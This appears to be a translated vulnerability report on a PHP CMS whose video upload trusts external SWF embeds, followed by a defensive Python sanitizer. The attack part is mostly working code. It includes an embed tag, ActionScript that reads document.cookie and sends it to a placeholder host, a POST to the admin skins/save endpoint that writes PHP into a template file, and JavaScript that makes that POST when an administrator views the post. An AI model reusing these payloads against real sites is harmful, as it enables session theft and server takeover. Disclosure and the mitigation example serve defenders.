### Brief description:
As the title says: SWF.
### Details:
The video upload feature places too much trust in external SWF files.
[![c1.jpg](https://images.seebug.org/upload/201406/0621524231425833140e83b2dc5fcdb9fc0993ba.jpg)](https://images.seebug.org/upload/201406/0621524231425833140e83b2dc5fcdb9fc0993ba.jpg)
The following code can be inserted:
```
<embed src=http://xxx.xxx/xss.swf type="application/x-shockwave-flash" allowfullscreen="true" allownetworking="all" allowscriptaccess="always">
```
Construct a malicious SWF that executes JS,
for example an alert like this:
[![c2.jpg](https://images.seebug.org/upload/201406/062155455f9b56cc7fe14d06dddf5218a004f63f.jpg)](https://images.seebug.org/upload/201406/062155455f9b56cc7fe14d06dddf5218a004f63f.jpg)
[![c3.jpg](https://images.seebug.org/upload/201406/06215554fd88a72dd3429292de9560b3b30471bf.jpg)](https://images.seebug.org/upload/201406/06215554fd88a72dd3429292de9560b3b30471bf.jpg)
This is the SWF code that retrieves the cookie:
```
package {
    import flash.external.ExternalInterface;
    import flash.display.Sprite;
    import flash.events.Event;
    import flash.net.URLLoader;
    import flash.net.URLRequest;
    import flash.text.TextField;
    import flash.text.TextFieldAutoSize;
    import flash.xml.*;
    import flash.events.IOErrorEvent;
    import flash.events.*;
    import flash.net.*;

    /**
     * @author User
     */
    public class csrf extends Sprite {
        private var loader:URLLoader;

        public function csrf() {
            // Possible only because the page embeds the SWF with allowscriptaccess="always"
            var res:String = ExternalInterface.call("function(){return document.cookie;}");
            doGet(res);
        }

        // Sends the value to an external URL as a GET parameter
        private function doGet(res:String):void {
            loader = new URLLoader();
            var target:String = "http://xxx/xxx.php?get=" + res;
            var request:URLRequest = new URLRequest(target);
            try {
                loader.load(request);
            } catch (error:Error) {
                sendDatatoJS("Error: " + error.getStackTrace());
            }
        }

        private function sendDatatoJS(data:String):void {
            trace(data);
            ExternalInterface.call("console.log", data);
        }
    }
}
```
A shell can be obtained from the admin backend:
http://localhost/index.php/admin/skins/save
POST the following data:
```
path=.%2Fskins%2Findex%2Fdefault%2Fhtml%2Fcs-404.php&CS_Name=cs-404&CS_Neir=<?php phpinfo();?>&Submit=+%E4%BF%AE%E6%94%B9+
```
The shell is obtained:
[![c4.jpg](https://images.seebug.org/upload/201406/06220016d3d35306e4845759c7cb60b68958d344.jpg)](https://images.seebug.org/upload/201406/06220016d3d35306e4845759c7cb60b68958d344.jpg)
We can have the SWF load a remote JS file.
The JS code is:
```
var request = false;
if (window.XMLHttpRequest) {
    request = new XMLHttpRequest();
    if (request.overrideMimeType) {
        request.overrideMimeType('text/xml');
    }
} else if (window.ActiveXObject) {
    var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
    for (var i = 0; i < versions.length; i++) {
        try {
            request = new ActiveXObject(versions[i]);
        } catch (e) {}
    }
}
xmlhttp = request;
// Same admin endpoint and form data as the manual POST above
url = "http://xxx.com/index.php/admin/skins/save";
var params = 'path=.%2Fskins%2Findex%2Fdefault%2Fhtml%2Fcs-404.php&CS_Name=cs-404&CS_Neir=<?php phpinfo();?>&Submit=+%E4%BF%AE%E6%94%B9+';
xmlhttp.open("POST", url, true);
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlhttp.setRequestHeader("Content-length", params.length);
xmlhttp.setRequestHeader("Connection", "Keep-Alive");
xmlhttp.setRequestHeader("Accept", "text/html,application/xhtm+xml,application/xml;q=0.9,*/*;q=0.8");
xmlhttp.withCredentials = "true";
xmlhttp.send(params);
```
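CORS allows data to be transferred across domains, so the shell is obtained when an administrator reviews the video post in the backend.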
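
A server-side mitigation for the embed trust issue described above, as an added example that is not part of the original report or the CMS's own code: instead of storing the submitted tag, parse it, check the player host against an allowlist, and emit a server-built `<embed>` with script access disabled. The allowlisted host, the class name and the function name are assumptions, and Python is used only for illustration.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumption: the player hosts this site trusts (constructed placeholder value).
ALLOWED_PLAYER_HOSTS = {"player.example-video.test"}


class EmbedReader(HTMLParser):
    """Records <embed> attributes and the names of any other tags submitted."""

    def __init__(self):
        super().__init__()
        self.embeds, self.other_tags = [], []

    def handle_starttag(self, tag, attrs):
        if tag == "embed":
            self.embeds.append(dict(attrs))
        else:
            self.other_tags.append(tag)


def rebuild_embed(user_html):
    """Return a server-generated <embed> for an allowlisted player, else None.

    Nothing the user typed is echoed except the validated src, so
    allowscriptaccess/allownetworking are always the server's values.
    """
    reader = EmbedReader()
    reader.feed(user_html)
    reader.close()
    if len(reader.embeds) != 1 or reader.other_tags:
        return None  # exactly one <embed> and no other markup
    src = (reader.embeds[0].get("src") or "").strip()
    try:
        url = urlsplit(src)
    except ValueError:
        return None  # malformed URL
    # Compare the whole netloc so userinfo, ports and backslash tricks fail.
    if url.scheme not in ("http", "https") or url.netloc.lower() not in ALLOWED_PLAYER_HOSTS:
        return None  # scheme-less, javascript:, or untrusted host
    return (
        '<embed src="%s" type="application/x-shockwave-flash" '
        'allowfullscreen="true" allownetworking="internal" '
        'allowscriptaccess="never">' % escape(src, quote=True)
    )
```

With `allowscriptaccess="never"` the `ExternalInterface.call` in the SWF above can no longer reach the page's JavaScript, even if a trusted host later serves a hostile file.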
### Proof of vulnerability:
As described above.